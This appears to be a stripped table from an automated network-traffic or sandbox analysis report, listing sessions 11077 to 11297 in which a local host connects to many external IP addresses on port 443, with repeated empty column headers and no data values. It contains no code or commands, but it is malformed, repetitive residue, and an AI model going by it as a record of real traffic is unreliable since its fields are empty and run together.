                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11077192.168.2.1350400128.179.116.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11078192.168.2.1350408163.127.16.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11079192.168.2.1349812112.65.145.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11080192.168.2.1342864154.173.112.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11081192.168.2.1347728217.134.50.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11082192.168.2.134703648.243.226.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11083192.168.2.1341500116.119.202.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11084192.168.2.135498817.210.252.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11085192.168.2.134176041.214.163.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11086192.168.2.1337742167.111.69.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11087192.168.2.1357752206.206.108.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11088192.168.2.133328649.210.155.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11089192.168.2.1356656155.124.229.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11090192.168.2.1339680213.27.194.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11091192.168.2.1336416108.159.30.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11092192.168.2.1343456103.48.202.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11093192.168.2.1344380165.25.137.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11094192.168.2.135160613.196.79.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11095192.168.2.1344950195.41.128.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11096192.168.2.1348890209.27.128.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11097192.168.2.1340280148.98.155.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11098192.168.2.134130693.127.46.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11099192.168.2.1351858174.147.103.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11100192.168.2.1336122212.126.157.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11101192.168.2.1344664103.108.6.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11102192.168.2.1357336102.157.153.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11103192.168.2.1341048135.70.242.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11104192.168.2.1342736163.189.156.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11105192.168.2.133689678.72.14.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11106192.168.2.13526525.222.38.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11107192.168.2.134389892.234.165.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11108192.168.2.1338966106.77.69.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11109192.168.2.134179846.20.246.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11110192.168.2.1336046159.133.164.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11111192.168.2.13501041.118.49.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11112192.168.2.1345750100.247.102.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11113192.168.2.1343364151.163.79.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11114192.168.2.135442248.40.174.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11115192.168.2.133657618.136.46.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11116192.168.2.1333494101.15.103.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11117192.168.2.1339988120.32.249.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11118192.168.2.13582844.232.249.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11119192.168.2.135678653.237.23.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11120192.168.2.134180258.136.82.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11121192.168.2.134627897.12.228.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11122192.168.2.134071094.62.83.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11123192.168.2.133491440.108.82.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11124192.168.2.134556893.148.75.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11125192.168.2.134822244.26.228.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11126192.168.2.135009640.209.126.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11127192.168.2.1350380180.147.64.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11128192.168.2.1359426218.159.213.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11129192.168.2.1339730101.75.218.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11130192.168.2.134751069.102.164.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11131192.168.2.133375223.119.148.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11132192.168.2.1350908165.159.219.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11133192.168.2.1337452118.136.235.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11134192.168.2.133831044.78.36.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11135192.168.2.133331295.49.101.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11136192.168.2.1339218129.114.19.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11137192.168.2.135528613.105.99.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11138192.168.2.1356226119.123.39.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11139192.168.2.1357504205.108.193.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11140192.168.2.1340382160.34.8.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11141192.168.2.1354614117.182.194.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11142192.168.2.1357632142.121.47.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11143192.168.2.1336360138.90.69.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11144192.168.2.136072450.45.154.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11145192.168.2.1341632220.177.86.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11146192.168.2.1357606125.42.41.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11147192.168.2.1350574220.76.233.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11148192.168.2.1343366102.103.110.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11149192.168.2.1354190211.115.247.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11150192.168.2.1347202164.241.26.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11151192.168.2.136073257.111.139.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11152192.168.2.136080649.209.173.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11153192.168.2.135959298.74.229.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11154192.168.2.135739837.21.205.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11155192.168.2.1341718164.4.178.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11156192.168.2.1352834139.158.219.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11157192.168.2.134940060.37.200.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11158192.168.2.135388620.36.39.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11159192.168.2.1356094117.134.225.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11160192.168.2.1343422142.192.52.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11161192.168.2.1351686208.210.175.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11162192.168.2.1357420135.67.101.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11163192.168.2.1337182170.115.26.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11164192.168.2.133363473.96.2.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11165192.168.2.1342438202.70.24.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11166192.168.2.133945651.108.66.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11167192.168.2.134087062.200.63.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11168192.168.2.133416082.88.144.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11169192.168.2.134440620.229.21.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11170192.168.2.1342720196.189.73.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11171192.168.2.135354686.232.123.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11172192.168.2.1354118207.121.105.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11173192.168.2.135681053.113.20.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11174192.168.2.1354950152.218.178.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11175192.168.2.1355938174.107.208.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11176192.168.2.1340240171.95.202.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11177192.168.2.1350340152.3.247.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11178192.168.2.134901848.71.136.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11179192.168.2.1346426162.4.144.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11180192.168.2.1347756154.76.182.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11181192.168.2.1350552221.115.161.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11182192.168.2.1339548139.148.80.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11183192.168.2.1345376104.178.22.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11184192.168.2.1336050106.114.120.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11185192.168.2.1338906136.229.167.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11186192.168.2.134931095.153.215.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11187192.168.2.1357402165.99.222.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11188192.168.2.134865435.40.167.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11189192.168.2.135635075.182.5.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11190192.168.2.1341326175.89.117.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11191192.168.2.1360802163.150.218.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192192.168.2.133785039.28.222.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11193192.168.2.1346354222.155.132.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11194192.168.2.1352888201.235.151.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11195192.168.2.134947652.192.104.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11196192.168.2.1353376115.154.61.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11197192.168.2.1352920188.203.51.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11198192.168.2.1351062119.107.154.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11199192.168.2.136059091.218.250.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11200192.168.2.135515050.90.190.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11201192.168.2.1340562160.8.149.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11202192.168.2.13580565.72.117.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11203192.168.2.1335654184.245.70.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11204192.168.2.135947072.103.93.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11205192.168.2.135688846.223.222.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11206192.168.2.1337740120.135.248.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11207192.168.2.133993691.81.29.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11208192.168.2.1349954219.218.98.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11209192.168.2.136052466.1.81.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11210192.168.2.13364985.204.245.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11211192.168.2.134610049.69.228.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11212192.168.2.1337614164.44.15.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11213192.168.2.1333704174.22.128.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11214192.168.2.1356308143.44.14.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11215192.168.2.1359940101.154.37.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11216192.168.2.1338064123.10.60.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11217192.168.2.1339628151.228.247.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11218192.168.2.1335666129.24.214.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11219192.168.2.1359520128.101.223.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11220192.168.2.1352378132.66.224.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11221192.168.2.13477822.1.255.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11222192.168.2.1358628201.118.112.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11223192.168.2.133562465.186.176.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11224192.168.2.1334878183.20.172.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11225192.168.2.133894284.17.124.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11226192.168.2.1341092163.210.70.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11227192.168.2.1336670221.16.77.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11228192.168.2.133297463.181.151.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11229192.168.2.1345020184.161.179.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11230192.168.2.1340856168.222.255.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11231192.168.2.134713648.81.82.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11232192.168.2.135869212.249.226.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11233192.168.2.1340020217.159.61.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11234192.168.2.1340582192.113.43.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11235192.168.2.134239881.119.253.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11236192.168.2.133641881.123.129.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11237192.168.2.135102681.202.163.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11238192.168.2.135213061.194.63.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11239192.168.2.135701869.77.4.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11240192.168.2.1347966211.215.74.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11241192.168.2.134883652.188.91.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11242192.168.2.13466162.81.202.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11243192.168.2.1334230219.104.64.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11244192.168.2.1359326136.223.251.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11245192.168.2.133581653.35.136.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11246192.168.2.1343914125.34.69.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11247192.168.2.1350856153.205.11.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11248192.168.2.134721219.202.231.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11249192.168.2.1353580109.176.24.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11250192.168.2.1345152194.130.46.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11251192.168.2.136074646.235.94.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11252192.168.2.1355038174.195.120.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11253192.168.2.134730460.105.203.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11254192.168.2.133360225.44.253.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11255192.168.2.135156847.90.131.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11256192.168.2.134972295.202.197.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11257192.168.2.1350548158.187.185.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11258192.168.2.134002220.255.153.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11259192.168.2.133380097.131.216.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11260192.168.2.1341734134.170.221.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11261192.168.2.1341110221.227.45.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11262192.168.2.13468161.90.185.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11263192.168.2.1357640113.35.229.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11264192.168.2.13447064.200.180.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11265192.168.2.133412458.52.51.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11266192.168.2.133748848.132.44.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11267192.168.2.1335058121.194.28.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11268192.168.2.1345462188.11.193.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11269192.168.2.135892451.56.217.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11270192.168.2.134301696.73.181.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11271192.168.2.135701497.167.200.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11272192.168.2.1356108179.202.32.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11273192.168.2.1354116149.152.175.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11274192.168.2.1345064181.160.51.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11275192.168.2.1356504178.193.208.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11276192.168.2.1339048173.68.181.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11277192.168.2.133984064.10.73.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11278192.168.2.13539962.194.186.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11279192.168.2.1350352175.220.246.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11280192.168.2.1352578138.20.105.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11281192.168.2.1336690218.16.177.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11282192.168.2.1336720182.54.215.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11283192.168.2.1360606218.142.143.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11284192.168.2.1353194135.116.26.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11285192.168.2.134224236.81.151.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11286192.168.2.1348976147.171.16.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11287192.168.2.1346292105.203.204.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11288192.168.2.135846032.106.47.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11289192.168.2.134296299.237.190.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11290192.168.2.136023652.127.60.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11291192.168.2.1354710185.241.48.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11292192.168.2.1336818174.19.166.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11293192.168.2.1350512107.212.18.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11294192.168.2.135382695.35.194.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11295192.168.2.1354292141.45.237.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11296192.168.2.133712888.214.102.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11297192.168.2.1335512187.198.130.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
